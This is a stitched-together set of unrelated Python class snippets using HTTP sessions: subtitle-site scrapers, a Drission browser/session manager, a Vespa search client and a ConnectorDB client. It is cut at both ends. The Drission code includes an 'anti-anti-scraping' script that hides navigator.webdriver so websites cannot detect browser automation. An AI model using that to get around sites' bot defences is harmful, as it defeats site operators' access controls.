= video_format subtitle.year = year subtitle.tvdb_id = tvdb_id return subs else: return [] # Looking for subtitles in first page for subtitle in root.findall('data/subtitles/subtitle'): if '{0}x{1:02}'.format(season, episode) in subtitle.find('name').text.lower(): logger.debug('Found subtitle id %d - %r - %r', int(subtitle.find('id').text), subtitle.find('name').text, subtitle.find('version').text) sub = ItaSASubtitle( int(subtitle.find('id').text), subtitle.find('show_name').text, season, episode, video_format, year, tvdb_id, subtitle.find('name').text) subtitles.append(sub) # Not in the first page of result try next (if any) next_page = root.find('data/next') while next_page.text is not None: # pragma: no cover r = self.session.get(next_page.text, timeout=30) r.raise_for_status() root = etree.fromstring(r.content) logger.info('Loading subtitles page %r', root.data.page.text) # Looking for show in following pages for subtitle in root.findall('data/subtitles/subtitle'): if '{0}x{1:02}'.format(season, episode) in subtitle.find('name').text.lower(): logger.debug('Found subtitle id %d - %r - %r', int(subtitle.find('id').text), subtitle.find('name').text, subtitle.find('version').text) sub = ItaSASubtitle( int(subtitle.find('id').text), subtitle.find('show_name').text, season, episode, video_format, year, tvdb_id, subtitle.find('name').text) subtitles.append(sub) next_page = root.find('data/next') # Download the subs found, can be more than one in zip additional_subs = [] for sub in subtitles: # open the zip content = self._download_zip(sub.sub_id) if not is_zipfile(io.BytesIO(content)): # pragma: no cover if 'limite di download' in content: raise TooManyRequests() else: raise ConfigurationError('Not a zip file: {!r}'.format(content)) with ZipFile(io.BytesIO(content)) as zf: if len(zf.namelist()) > 1: # pragma: no cover for index, name in enumerate(zf.namelist()): if index == 0: # First element sub.content = fix_line_ending(zf.read(name)) sub.full_data = name else: add_sub = copy.deepcopy(sub) add_sub.content = fix_line_ending(zf.read(name)) add_sub.full_data = name additional_subs.append(add_sub) else: sub.content = fix_line_ending(zf.read(zf.namelist()[0])) sub.full_data = zf.namelist()[0] return subtitles + additional_subs def list_subtitles(self, video, languages): return self.query(video.series, video.season, video.episode, video.format, video.resolution) def download_subtitle(self, subtitle): # pragma: no cover pass
class Drission(object): """Drission类用于管理WebDriver对象和Session对象,是驱动器的角色""" def __init__(self, driver_or_options: Union[RemoteWebDriver, Options, DriverOptions, bool] = None, session_or_options: Union[Session, dict, SessionOptions, bool] = None, ini_path: str = None, proxy: dict = None): """初始化,可接收现成的WebDriver和Session对象,或接收它们的配置信息生成对象 \n :param driver_or_options: driver对象或DriverOptions、Options类,传入False则创建空配置对象 :param session_or_options: Session对象或设置字典,传入False则创建空配置对象 :param ini_path: ini文件路径 :param proxy: 代理设置 """ self._session = None self._driver = None self._session_options = None self._driver_options = None self._debugger = None self._proxy = proxy # ------------------处理session options---------------------- if session_or_options is None: self._session_options = SessionOptions(ini_path=ini_path).as_dict() elif session_or_options is False: self._session_options = SessionOptions(read_file=False).as_dict() elif isinstance(session_or_options, Session): self._session = session_or_options elif isinstance(session_or_options, SessionOptions): self._session_options = session_or_options.as_dict() elif isinstance(session_or_options, dict): self._session_options = session_or_options else: raise TypeError( 'session_or_options参数只能接收Session, dict, SessionOptions或False。') # ------------------处理driver options---------------------- if driver_or_options is None: self._driver_options = DriverOptions(ini_path=ini_path) elif driver_or_options is False: self._driver_options = DriverOptions(read_file=False) elif isinstance(driver_or_options, RemoteWebDriver): self._driver = driver_or_options elif isinstance(driver_or_options, (Options, DriverOptions)): self._driver_options = driver_or_options else: raise TypeError( 'driver_or_options参数只能接收WebDriver, Options, DriverOptions或False。' ) def __del__(self): """关闭对象时关闭浏览器和Session""" try: self.close() except ImportError: pass @property def session(self) -> Session: """返回Session对象,如未初始化则按配置信息创建""" if self._session is None: self._set_session(self._session_options) if self._proxy: self._session.proxies = self._proxy return self._session @property def driver(self) -> WebDriver: """返回WebDriver对象,如未初始化则按配置信息创建。 \n 如设置了本地调试浏览器,可自动接入或打开浏览器进程。 """ if self._driver is None: if not self.driver_options.debugger_address and self._proxy: self.driver_options.add_argument( f'--proxy-server={self._proxy["http"]}') driver_path = self.driver_options.driver_path or 'chromedriver' chrome_path = self.driver_options.binary_location or 'chrome.exe' # -----------若指定debug端口且该端口未在使用中,则先启动浏览器进程----------- if self.driver_options.debugger_address and _check_port( self.driver_options.debugger_address) is False: from subprocess import Popen port = self.driver_options.debugger_address.split(':')[-1] # 启动浏览器进程,同时返回该进程使用的 chrome.exe 路径 chrome_path, self._debugger = _create_chrome( chrome_path, port, self.driver_options.arguments, self._proxy) # -----------创建WebDriver对象----------- self._driver = _create_driver(chrome_path, driver_path, self.driver_options) # 反反爬设置 try: self._driver.execute_script( 'Object.defineProperty(navigator,"webdriver",{get:() => undefined,});' ) except Exception: pass # self._driver.execute_cdp_cmd( # 'Page.addScriptToEvaluateOnNewDocument', # {'source': 'Object.defineProperty(navigator,"webdriver",{get:() => Chrome,});'}) return self._driver @property def driver_options(self) -> Union[DriverOptions, Options]: """返回driver配置信息""" return self._driver_options @property def session_options(self) -> dict: """返回session配置信息""" return self._session_options @session_options.setter def session_options(self, options: Union[dict, SessionOptions]) -> None: """设置session配置 \n :param options: session配置字典 :return: None """ self._session_options = _session_options_to_dict(options) self._set_session(self._session_options) @property def proxy(self) -> Union[None, dict]: """返回代理信息""" return self._proxy @proxy.setter def proxy(self, proxies: dict = None) -> None: """设置代理信息 \n :param proxies: 代理信息字典 :return: None """ self._proxy = proxies if self._session: self._session.proxies = proxies if self._driver: cookies = self._driver.get_cookies() url = self._driver.current_url self._driver.quit() self._driver = None self._driver = self.driver self._driver.get(url) for cookie in cookies: self.set_cookies(cookie, set_driver=True) @property def debugger_progress(self): """调试浏览器进程""" return self._debugger def kill_browser(self) -> None: """关闭浏览器进程(如果可以)""" if self.debugger_progress: self.debugger_progress.kill() return pid = self.get_browser_progress_id() from os import popen from platform import system if pid and system().lower() == 'windows' \ and popen(f'tasklist | findstr {pid}').read().lower().startswith('chrome.exe'): popen(f'taskkill /pid {pid} /F') else: self._driver.quit() def get_browser_progress_id(self) -> Union[str, None]: """获取浏览器进程id""" if self.debugger_progress: return self.debugger_progress.pid address = str(self.driver_options.debugger_address).split(':') if len(address) == 2: ip, port = address if ip not in ('127.0.0.1', 'localhost') or not port.isdigit(): return None from os import popen txt = '' progresses = popen(f'netstat -nao | findstr :{port}').read().split( '\n') for progress in progresses: if 'LISTENING' in progress: txt = progress break if not txt: return None return txt.split(' ')[-1] def hide_browser(self) -> None: """隐藏浏览器界面""" self._show_or_hide_browser() def show_browser(self) -> None: """显示浏览器界面""" self._show_or_hide_browser(False) def _show_or_hide_browser(self, hide: bool = True) -> None: from platform import system if system().lower() != 'windows': raise OSError('该方法只能在Windows系统使用。') try: from win32gui import ShowWindow from win32con import SW_HIDE, SW_SHOW except ImportError: raise ImportError('请先安装:pip install pypiwin32') pid = self.get_browser_progress_id() if not pid: print( '只有设置了debugger_address参数才能使用 show_browser() 和 hide_browser()') return hds = _get_chrome_hwnds_from_pid(pid) sw = SW_HIDE if hide else SW_SHOW for hd in hds: ShowWindow(hd, sw) def set_cookies(self, cookies: Union[RequestsCookieJar, list, tuple, str, dict], set_session: bool = False, set_driver: bool = False) -> None: """设置cookies \n :param cookies: cookies信息,可为CookieJar, list, tuple, str, dict :param set_session: 是否设置session的cookies :param set_driver: 是否设置driver的cookies :return: None """ cookies = _cookies_to_tuple(cookies) for cookie in cookies: if cookie['value'] is None: cookie['value'] = '' # 添加cookie到session if set_session: kwargs = { x: cookie[x] for x in cookie if x.lower() not in ('name', 'value', 'httponly', 'expiry', 'samesite') } if 'expiry' in cookie: kwargs['expires'] = cookie['expiry'] self.session.cookies.set(cookie['name'], cookie['value'], **kwargs) # 添加cookie到driver if set_driver: if 'expiry' in cookie: cookie['expiry'] = int(cookie['expiry']) try: browser_domain = extract(self.driver.current_url).fqdn except AttributeError: browser_domain = '' if not cookie.get('domain', None): if browser_domain: url = extract(browser_domain) cookie_domain = f'{url.domain}.{url.suffix}' else: raise ValueError('cookie中没有域名或浏览器未访问过URL。') cookie['domain'] = cookie_domain else: cookie_domain = cookie['domain'] if cookie['domain'][ 0] != '.' else cookie['domain'][1:] if cookie_domain not in browser_domain: self.driver.get(cookie_domain if cookie_domain.startswith( 'http://') else f'http://{cookie_domain}') # 避免selenium自动添加.后无法正确覆盖已有cookie if cookie['domain'][0] != '.': c = self.driver.get_cookie(cookie['name']) if c and c['domain'] == cookie['domain']: self.driver.delete_cookie(cookie['name']) self.driver.add_cookie(cookie) def _set_session(self, data: dict) -> None: """根据传入字典对session进行设置 \n :param data: session配置字典 :return: None """ if self._session is None: self._session = Session() attrs = [ 'headers', 'auth', 'proxies', 'hooks', 'params', 'verify', 'cert', 'stream', 'trust_env', 'max_redirects' ] # , 'adapters' if 'cookies' in data: self.set_cookies(data['cookies'], set_session=True) for i in attrs: if i in data: self._session.__setattr__(i, data[i]) def cookies_to_session(self, copy_user_agent: bool = False) -> None: """把driver对象的cookies复制到session对象 \n :param copy_user_agent: 是否复制ua信息 :return: None """ if copy_user_agent: user_agent_to_session(self.driver, self.session) self.set_cookies(self.driver.get_cookies(), set_session=True) def cookies_to_driver(self, url: str) -> None: """把session对象的cookies复制到driver对象 \n :param url: 作用域 :return: None """ browser_domain = extract(self.driver.current_url).fqdn ex_url = extract(url) if ex_url.fqdn not in browser_domain: self.driver.get(url) domain = f'{ex_url.domain}.{ex_url.suffix}' cookies = [] for cookie in self.session.cookies: if cookie.domain == '': cookie.domain = domain if domain in cookie.domain: cookies.append(cookie) self.set_cookies(cookies, set_driver=True) def close_driver(self, kill: bool = False) -> None: """关闭driver和浏览器""" if self._driver: if kill: self.kill_browser() else: self._driver.quit() self._driver = None def close_session(self) -> None: """关闭session""" if self._session: self._session.close() self._session = None def close(self) -> None: """关闭session、driver和浏览器""" if self._driver: self.close_driver() if self._session: self.close_session()
class PodnapisiProvider(Provider): languages = {Language("por", "BR"), Language("srp", script="Latn")} | { Language.fromalpha2(l) for l in language_converters["alpha2"].codes } video_types = (Episode, Movie) server_url = "http://podnapisi.net/subtitles/" def initialize(self): self.session = Session() self.session.headers = {"User-Agent": "Subliminal/%s" % get_version(__version__)} def terminate(self): self.session.close() def query(self, language, keyword, season=None, episode=None, year=None): # set parameters, see http://www.podnapisi.net/forum/viewtopic.php?f=62&t=26164#p212652 params = {"sXML": 1, "sL": str(language), "sK": keyword} is_episode = False if season and episode: is_episode = True params["sTS"] = season params["sTE"] = episode if year: params["sY"] = year # loop over paginated results logger.info("Searching subtitles %r", params) subtitles = [] pids = set() while True: # query the server xml = etree.fromstring(self.session.get(self.server_url + "search/old", params=params, timeout=10).content) # exit if no results if not int(xml.find("pagination/results").text): logger.debug("No subtitles found") break # loop over subtitles for subtitle_xml in xml.findall("subtitle"): # read xml elements language = Language.fromietf(subtitle_xml.find("language").text) hearing_impaired = "n" in (subtitle_xml.find("flags").text or "") page_link = subtitle_xml.find("url").text pid = subtitle_xml.find("pid").text releases = [] if subtitle_xml.find("release").text: for release in subtitle_xml.find("release").text.split(): release = re.sub(r"\.+$", "", release) # remove trailing dots release = "".join(filter(lambda x: ord(x) < 128, release)) # remove non-ascii characters releases.append(release) title = subtitle_xml.find("title").text season = int(subtitle_xml.find("tvSeason").text) episode = int(subtitle_xml.find("tvEpisode").text) year = int(subtitle_xml.find("year").text) if is_episode: subtitle = PodnapisiSubtitle( language, hearing_impaired, page_link, pid, releases, title, season=season, episode=episode, year=year, ) else: subtitle = PodnapisiSubtitle(language, hearing_impaired, page_link, pid, releases, title, year=year) # ignore duplicates, see http://www.podnapisi.net/forum/viewtopic.php?f=62&t=26164&start=10#p213321 if pid in pids: continue logger.debug("Found subtitle %r", subtitle) subtitles.append(subtitle) pids.add(pid) # stop on last page if int(xml.find("pagination/current").text) >= int(xml.find("pagination/count").text): break # increment current page params["page"] = int(xml.find("pagination/current").text) + 1 logger.debug("Getting page %d", params["page"]) return subtitles def list_subtitles(self, video, languages): if isinstance(video, Episode): return [ s for l in languages for s in self.query(l, video.series, season=video.season, episode=video.episode, year=video.year) ] elif isinstance(video, Movie): return [s for l in languages for s in self.query(l, video.title, year=video.year)] def download_subtitle(self, subtitle): # download as a zip logger.info("Downloading subtitle %r") r = self.session.get(self.server_url + subtitle.pid + "/download", params={"container": "zip"}, timeout=10) r.raise_for_status() # open the zip with ZipFile(io.BytesIO(r.content)) as zf: if len(zf.namelist()) > 1: raise ProviderError("More than one file to unzip") subtitle.content = fix_line_ending(zf.read(zf.namelist()[0]))
class PodnapisiProvider(Provider): """Podnapisi Provider.""" languages = ({Language('por', 'BR'), Language('srp', script='Latn')} | { Language.fromalpha2(l) for l in language_converters['alpha2'].codes }) server_url = 'http://podnapisi.net/subtitles/' subtitle_class = PodnapisiSubtitle def initialize(self): self.session = Session() self.session.headers[ 'User-Agent'] = 'Subliminal/%s' % __short_version__ def terminate(self): self.session.close() def query(self, language, keyword, season=None, episode=None, year=None): # set parameters, see http://www.podnapisi.net/forum/viewtopic.php?f=62&t=26164#p212652 params = {'sXML': 1, 'sL': str(language), 'sK': keyword} is_episode = False if season and episode: is_episode = True params['sTS'] = season params['sTE'] = episode if year: params['sY'] = year # loop over paginated results logger.info('Searching subtitles %r', params) subtitles = [] pids = set() while True: # query the server xml = etree.fromstring( self.session.get(self.server_url + 'search/old', params=params, timeout=10).content) # exit if no results if not int(xml.find('pagination/results').text): logger.debug('No subtitles found') break # loop over subtitles for subtitle_xml in xml.findall('subtitle'): # read xml elements language = Language.fromietf( subtitle_xml.find('language').text) hearing_impaired = 'n' in (subtitle_xml.find('flags').text or '') page_link = subtitle_xml.find('url').text pid = subtitle_xml.find('pid').text releases = [] if subtitle_xml.find('release').text: for release in subtitle_xml.find('release').text.split(): release = re.sub(r'\.+$', '', release) # remove trailing dots release = ''.join( filter(lambda x: ord(x) < 128, release)) # remove non-ascii characters releases.append(release) title = subtitle_xml.find('title').text season = int(subtitle_xml.find('tvSeason').text) episode = int(subtitle_xml.find('tvEpisode').text) year = int(subtitle_xml.find('year').text) if is_episode: subtitle = self.subtitle_class(language, hearing_impaired, page_link, pid, releases, title, season=season, episode=episode, year=year) else: subtitle = self.subtitle_class(language, hearing_impaired, page_link, pid, releases, title, year=year) # ignore duplicates, see http://www.podnapisi.net/forum/viewtopic.php?f=62&t=26164&start=10#p213321 if pid in pids: continue logger.debug('Found subtitle %r', subtitle) subtitles.append(subtitle) pids.add(pid) # stop on last page if int(xml.find('pagination/current').text) >= int( xml.find('pagination/count').text): break # increment current page params['page'] = int(xml.find('pagination/current').text) + 1 logger.debug('Getting page %d', params['page']) return subtitles def list_subtitles(self, video, languages): if isinstance(video, Episode): return [ s for l in languages for s in self.query(l, video.series, season=video.season, episode=video.episode, year=video.year) ] elif isinstance(video, Movie): return [ s for l in languages for s in self.query(l, video.title, year=video.year) ] def download_subtitle(self, subtitle): # download as a zip logger.info('Downloading subtitle %r', subtitle) r = self.session.get(self.server_url + subtitle.pid + '/download', params={'container': 'zip'}, timeout=10) r.raise_for_status() # open the zip with ZipFile(io.BytesIO(r.content)) as zf: if len(zf.namelist()) > 1: raise ProviderError('More than one file to unzip') subtitle.content = fix_line_ending(zf.read(zf.namelist()[0]))
def close(self): requestsSession.close(self) self.pool.stop()
class Vespa(object): def __init__( self, url: str, port: Optional[int] = None, deployment_message: Optional[List[str]] = None, cert: Optional[str] = None, output_file: IO = sys.stdout, ) -> None: """ Establish a connection with a Vespa application. :param url: Vespa instance URL. :param port: Vespa instance port. :param deployment_message: Message returned by Vespa engine after deployment. Used internally by deploy methods. :param cert: Path to certificate and key file. :param output_file: Output file to write output messages. >>> Vespa(url = "https://cord19.vespa.ai") # doctest: +SKIP >>> Vespa(url = "http://localhost", port = 8080) Vespa(http://localhost, 8080) >>> Vespa(url = "https://api.vespa-external.aws.oath.cloud", port = 4443, cert = "/path/to/cert-and-key.pem") # doctest: +SKIP """ self.output_file = output_file self.url = url self.port = port self.deployment_message = deployment_message self.cert = cert self.http_session = None if port is None: self.end_point = self.url else: self.end_point = str(url).rstrip("/") + ":" + str(port) self.search_end_point = self.end_point + "/search/" self._open_http_session() def __enter__(self): return self def __exit__(self, exc_type, exc_val, exc_tb): self.close() def asyncio(self): return VespaAsync(self) def _open_http_session(self): if self.http_session is not None: return adapter = HTTPAdapter(max_retries=retry_strategy) self.http_session = Session() self.http_session.mount("https://", adapter) self.http_session.mount("http://", adapter) return self.http_session def _close_http_session(self): if self.http_session is None: return self.http_session.close() def close(self): self._close_http_session() def __repr__(self): if self.port: return "Vespa({}, {})".format(self.url, self.port) else: return "Vespa({})".format(self.url) def get_application_status(self) -> Optional[Response]: """ Get application status. :return: """ end_point = "{}/ApplicationStatus".format(self.end_point) try: response = self.http_session.get(end_point, cert=self.cert) except ConnectionError: response = None return response def _build_query_body(self, query: Optional[str] = None, query_model: Optional[QueryModel] = None, recall: Optional[Tuple] = None, **kwargs) -> Dict: assert query is not None, "No 'query' specified." assert query_model is not None, "No 'query_model' specified." body = query_model.create_body(query=query) if recall is not None: body.update({ "recall": "+(" + " ".join( ["{}:{}".format(recall[0], str(doc)) for doc in recall[1]]) + ")" }) body.update(kwargs) return body def query(self, body: Optional[Dict] = None, query: Optional[str] = None, query_model: Optional[QueryModel] = None, debug_request: bool = False, recall: Optional[Tuple] = None, **kwargs) -> VespaQueryResponse: """ Send a query request to the Vespa application. Either send 'body' containing all the request parameters or specify 'query' and 'query_model'. :param body: Dict containing all the request parameters. :param query: Query string :param query_model: Query model :param debug_request: return request body for debugging instead of sending the request. :param recall: Tuple of size 2 where the first element is the name of the field to use to recall and the second element is a list of the values to be recalled. :param kwargs: Additional parameters to be sent along the request. :return: Either the request body if debug_request is True or the result from the Vespa application """ body = (self._build_query_body(query, query_model, recall, **kwargs) if body is None else body) if debug_request: return VespaQueryResponse(json={}, status_code=None, url=None, request_body=body) else: r = self.http_session.post(self.search_end_point, json=body, cert=self.cert) return VespaQueryResponse(json=r.json(), status_code=r.status_code, url=str(r.url)) def feed_data_point(self, schema: str, data_id: str, fields: Dict) -> VespaResponse: """ Feed a data point to a Vespa app. :param schema: The schema that we are sending data to. :param data_id: Unique id associated with this data point. :param fields: Dict containing all the fields required by the `schema`. :return: Response of the HTTP POST request. """ end_point = "{}/document/v1/{}/{}/docid/{}".format( self.end_point, schema, schema, str(data_id)) vespa_format = {"fields": fields} response = self.http_session.post(end_point, json=vespa_format, cert=self.cert) return VespaResponse( json=response.json(), status_code=response.status_code, url=str(response.url), operation_type="feed", ) def _feed_batch_sync(self, schema: str, batch: List[Dict]): return [ self.feed_data_point(schema, data_point["id"], data_point["fields"]) for data_point in batch ] async def _feed_batch_async(self, schema: str, batch: List[Dict]): async with VespaAsync(self) as async_app: return await async_app.feed_batch(schema=schema, batch=batch) def feed_batch(self, schema: str, batch: List[Dict], asynchronous=False): """ Feed a batch of data to a Vespa app. :param schema: The schema that we are sending data to. :param batch: A list of dict containing the keys 'id' and 'fields' to be used in the :func:`feed_data_point`. :param asynchronous: Set True to send data in async mode. Default to False. Create and execute the coroutine if there is no active running loop. Otherwise it returns the coroutine and requires await to be executed. :return: List of HTTP POST responses """ if asynchronous: try: _ = asyncio.get_running_loop() return self._feed_batch_async(schema=schema, batch=batch) except RuntimeError: return asyncio.run( self._feed_batch_async(schema=schema, batch=batch)) else: return self._feed_batch_sync(schema=schema, batch=batch) def delete_data(self, schema: str, data_id: str) -> VespaResponse: """ Delete a data point from a Vespa app. :param schema: The schema that we are deleting data from. :param data_id: Unique id associated with this data point. :return: Response of the HTTP DELETE request. """ end_point = "{}/document/v1/{}/{}/docid/{}".format( self.end_point, schema, schema, str(data_id)) response = self.http_session.delete(end_point, cert=self.cert) return VespaResponse( json=response.json(), status_code=response.status_code, url=str(response.url), operation_type="delete", ) def delete_batch(self, batch: List): """ Async delete a batch of data from a Vespa app. :param batch: A list of tuples with 'schema' and 'id' :return: """ return [self.delete_data(schema, id) for schema, id in batch] def delete_all_docs(self, content_cluster_name: str, schema: str) -> Response: """ Delete all documents associated with the schema :param content_cluster_name: Name of content cluster to GET from, or visit. :param schema: The schema that we are deleting data from. :return: Response of the HTTP DELETE request. """ end_point = "{}/document/v1/{}/{}/docid/?cluster={}&selection=true".format( self.end_point, schema, schema, content_cluster_name) response = self.http_session.delete(end_point, cert=self.cert) return response def get_data(self, schema: str, data_id: str) -> Response: """ Get a data point from a Vespa app. :param schema: The schema that we are getting data from. :param data_id: Unique id associated with this data point. :return: Response of the HTTP GET request. """ end_point = "{}/document/v1/{}/{}/docid/{}".format( self.end_point, schema, schema, str(data_id)) response = self.http_session.get(end_point, cert=self.cert) return VespaResponse( json=response.json(), status_code=response.status_code, url=str(response.url), operation_type="get", ) def get_batch(self, batch: List): """ Async get a batch of data from a Vespa app. :param batch: A list of tuples with 'schema' and 'id'. :return: """ return [self.get_data(schema, id) for schema, id in batch] def update_data(self, schema: str, data_id: str, fields: Dict, create: bool = False) -> VespaResponse: """ Update a data point in a Vespa app. :param schema: The schema that we are updating data. :param data_id: Unique id associated with this data point. :param fields: Dict containing all the fields you want to update. :param create: If true, updates to non-existent documents will create an empty document to update :return: Response of the HTTP PUT request. """ end_point = "{}/document/v1/{}/{}/docid/{}?create={}".format( self.end_point, schema, schema, str(data_id), str(create).lower()) vespa_format = { "fields": {k: { "assign": v } for k, v in fields.items()} } response = self.http_session.put(end_point, json=vespa_format, cert=self.cert) return VespaResponse( json=response.json(), status_code=response.status_code, url=str(response.url), operation_type="update", ) def update_batch(self, batch: List): """ Update a batch of data points. :param batch: A list of tuples with 'schema', 'id', 'fields', and 'create' :return: """ return [ self.update_data(schema, id, fields, create) for schema, id, fields, create in batch ] @staticmethod def annotate_data(hits, query_id, id_field, relevant_id, fields, relevant_score, default_score): data = [] for h in hits: record = {} record.update({"document_id": h["fields"][id_field]}) record.update({"query_id": query_id}) record.update({ "label": relevant_score if h["fields"][id_field] == relevant_id else default_score }) for field in fields: field_value = h["fields"].get(field, None) if field_value: if isinstance(field_value, dict): record.update(field_value) else: record.update({field: field_value}) data.append(record) return data def collect_training_data_point(self, query: str, query_id: str, relevant_id: str, id_field: str, query_model: QueryModel, number_additional_docs: int, fields: List[str], relevant_score: int = 1, default_score: int = 0, **kwargs) -> List[Dict]: """ Collect training data based on a single query :param query: Query string. :param query_id: Query id represented as str. :param relevant_id: Relevant id represented as a str. :param id_field: The Vespa field representing the document id. :param query_model: Query model. :param number_additional_docs: Number of additional documents to retrieve for each relevant document. :param fields: Which fields should be retrieved. :param relevant_score: Score to assign to relevant documents. Default to 1. :param default_score: Score to assign to the additional documents that are not relevant. Default to 0. :param kwargs: Extra keyword arguments to be included in the Vespa Query. :return: List of dicts containing the document id (document_id), query id (query_id), scores (relevant) and vespa rank features returned by the Query model RankProfile used. """ relevant_id_result = self.query(query=query, query_model=query_model, recall=(id_field, [relevant_id]), **kwargs) hits = relevant_id_result.hits features = [] if len(hits) == 1 and hits[0]["fields"][id_field] == relevant_id: if number_additional_docs > 0: random_hits_result = self.query(query=query, query_model=query_model, hits=number_additional_docs, **kwargs) hits.extend(random_hits_result.hits) features = self.annotate_data( hits=hits, query_id=query_id, id_field=id_field, relevant_id=relevant_id, fields=fields, relevant_score=relevant_score, default_score=default_score, ) return features def collect_training_data(self, labeled_data: List[Dict], id_field: str, query_model: QueryModel, number_additional_docs: int, relevant_score: int = 1, default_score: int = 0, show_progress: Optional[int] = None, **kwargs) -> DataFrame: """ Collect training data based on a set of labelled data. :param labeled_data: Labelled data containing query, query_id and relevant ids. :param id_field: The Vespa field representing the document id. :param query_model: Query model. :param number_additional_docs: Number of additional documents to retrieve for each relevant document. :param relevant_score: Score to assign to relevant documents. Default to 1. :param default_score: Score to assign to the additional documents that are not relevant. Default to 0. :param show_progress: Prints the the current point being collected every `show_progress` step. Default to None, in which case progress is not printed. :param kwargs: Extra keyword arguments to be included in the Vespa Query. :return: DataFrame containing document id (document_id), query id (query_id), scores (relevant) and vespa rank features returned by the Query model RankProfile used. """ training_data = [] number_queries = len(labeled_data) idx_total = 0 for query_idx, query_data in enumerate(labeled_data): number_relevant_docs = len(query_data["relevant_docs"]) for doc_idx, doc_data in enumerate(query_data["relevant_docs"]): idx_total += 1 if (show_progress is not None) and (idx_total % show_progress == 0): print( "Query {}/{}, Doc {}/{}. Query id: {}. Doc id: {}". format( query_idx, number_queries, doc_idx, number_relevant_docs, query_data["query_id"], doc_data["id"], ), file=self.output_file, ) training_data_point = self.collect_training_data_point( query=query_data["query"], query_id=query_data["query_id"], relevant_id=doc_data["id"], id_field=id_field, query_model=query_model, number_additional_docs=number_additional_docs, relevant_score=doc_data.get("score", relevant_score), default_score=default_score, **kwargs) training_data.extend(training_data_point) training_data = DataFrame.from_records(training_data) return training_data def evaluate_query(self, eval_metrics: List[EvalMetric], query_model: QueryModel, query_id: str, query: str, id_field: str, relevant_docs: List[Dict], default_score: int = 0, detailed_metrics=False, **kwargs) -> Dict: """ Evaluate a query according to evaluation metrics :param eval_metrics: A list of evaluation metrics. :param query_model: Query model. :param query_id: Query id represented as str. :param query: Query string. :param id_field: The Vespa field representing the document id. :param relevant_docs: A list with dicts where each dict contains a doc id a optionally a doc score. :param default_score: Score to assign to the additional documents that are not relevant. Default to 0. :param detailed_metrics: Return intermediate computations if available. :param kwargs: Extra keyword arguments to be included in the Vespa Query. :return: Dict containing query_id and metrics according to the selected evaluation metrics. """ query_results = self.query(query=query, query_model=query_model, **kwargs) evaluation = {"model": query_model.name, "query_id": query_id} for evaluator in eval_metrics: evaluation.update( evaluator.evaluate_query( query_results, relevant_docs, id_field, default_score, detailed_metrics, )) return evaluation def evaluate(self, labeled_data: Union[List[Dict], DataFrame], eval_metrics: List[EvalMetric], query_model: Union[QueryModel, List[QueryModel]], id_field: str, default_score: int = 0, detailed_metrics=False, per_query=False, aggregators=None, **kwargs) -> DataFrame: """ Evaluate a :class:`QueryModel` according to a list of :class:`EvalMetric`. labeled_data can be a DataFrame or a List of Dict: >>> labeled_data_df = DataFrame( ... data={ ... "qid": [0, 0, 1, 1], ... "query": ["Intrauterine virus infections and congenital heart disease", "Intrauterine virus infections and congenital heart disease", "Clinical and immunologic studies in identical twins discordant for systemic lupus erythematosus", "Clinical and immunologic studies in identical twins discordant for systemic lupus erythematosus"], ... "doc_id": [0, 3, 1, 5], ... "relevance": [1,1,1,1] ... } ... ) >>> labeled_data = [ ... { ... "query_id": 0, ... "query": "Intrauterine virus infections and congenital heart disease", ... "relevant_docs": [{"id": 0, "score": 1}, {"id": 3, "score": 1}] ... }, ... { ... "query_id": 1, ... "query": "Clinical and immunologic studies in identical twins discordant for systemic lupus erythematosus", ... "relevant_docs": [{"id": 1, "score": 1}, {"id": 5, "score": 1}] ... } ... ] :param labeled_data: Labelled data containing query, query_id and relevant ids. See details about data format. :param eval_metrics: A list of evaluation metrics. :param query_model: Accept a Query model or a list of Query Models. :param id_field: The Vespa field representing the document id. :param default_score: Score to assign to the additional documents that are not relevant. Default to 0. :param detailed_metrics: Return intermediate computations if available. :param per_query: Set to True to return evaluation metrics per query. :param aggregators: Used only if `per_query=False`. List of pandas friendly aggregators to summarize per model metrics. We use ["mean", "median", "std"] by default. :param kwargs: Extra keyword arguments to be included in the Vespa Query. :return: DataFrame containing query_id and metrics according to the selected evaluation metrics. """ if isinstance(labeled_data, DataFrame): labeled_data = parse_labeled_data(df=labeled_data) if isinstance(query_model, QueryModel): query_model = [query_model] model_names = [model.name for model in query_model] assert len(model_names) == len(set( model_names)), "Duplicate model names. Choose unique model names." evaluation = [] for query_data in labeled_data: for model in query_model: evaluation_query = self.evaluate_query( eval_metrics=eval_metrics, query_model=model, query_id=query_data["query_id"], query=query_data["query"], id_field=id_field, relevant_docs=query_data["relevant_docs"], default_score=default_score, detailed_metrics=detailed_metrics, **kwargs) evaluation.append(evaluation_query) evaluation = DataFrame.from_records(evaluation) if not per_query: if not aggregators: aggregators = ["mean", "median", "std"] evaluation = (evaluation[[ x for x in evaluation.columns if x != "query_id" ]].groupby(by="model").agg(aggregators).T) return evaluation
class DatabaseConnection(object): def __init__(self, user_or_apikey=None, user_password=None, url="https://connectordb.com"): # Set up the API URL if not url.startswith("http"): url = "https://" + url if not url.endswith("/"): url = url + "/" self.baseurl = url self.url = urljoin(url, "/api/v1/") # Set up a session, which allows us to reuse connections self.r = Session() self.r.headers.update({'content-type': 'application/json'}) # Prepare the websocket self.ws = WebsocketHandler(self.url, None) # Set the authentication if any self.setauth(user_or_apikey, user_password) # Now set up the login path so we know what we're logged in as if user_password is not None: self.path = user_or_apikey + "/user" else: self.path = self.ping() def setauth(self, user_or_apikey=None, user_password=None): """ setauth sets the authentication header for use in the session. It is for use when apikey is updated or something of the sort, such that there is a seamless experience. """ auth = None if user_or_apikey is not None: # ConnectorDB allows login using both basic auth or an apikey url param. # The python client uses basic auth for all logins if user_password is None: # Login by api key - the basic auth login uses "" user and # apikey as password user_password = user_or_apikey user_or_apikey = "" auth = HTTPBasicAuth(user_or_apikey, user_password) self.r.auth = auth # Set the websocket's authentication self.ws.setauth(auth) def close(self): """Closes the active connections to ConnectorDB""" self.r.close() def handleresult(self, r): """Handles HTTP error codes for the given request Raises: AuthenticationError on the appropriate 4** errors ServerError if the response is not an ok (2**) Arguments: r -- The request result """ if r.status_code >= 400 and r.status_code < 500: msg = r.json() raise AuthenticationError(str(msg["code"]) + ": " + msg["msg"] + " (" + msg["ref"] + ")") elif r.status_code > 300: err = None try: msg = r.json() err = ServerError(str(msg["code"]) + ": " + msg["msg"] + " (" + msg["ref"] + ")") except: raise ServerError( "Server returned error, but did not give a valid error message") raise err return r def ping(self): """Attempts to ping the server using current credentials, and responds with the path of the currently authenticated device""" return self.handleresult(self.r.get(self.url, params={"q": "this"})).text def query(self, query_type, query=None): """Run the given query on the connection (POST request to /query)""" return 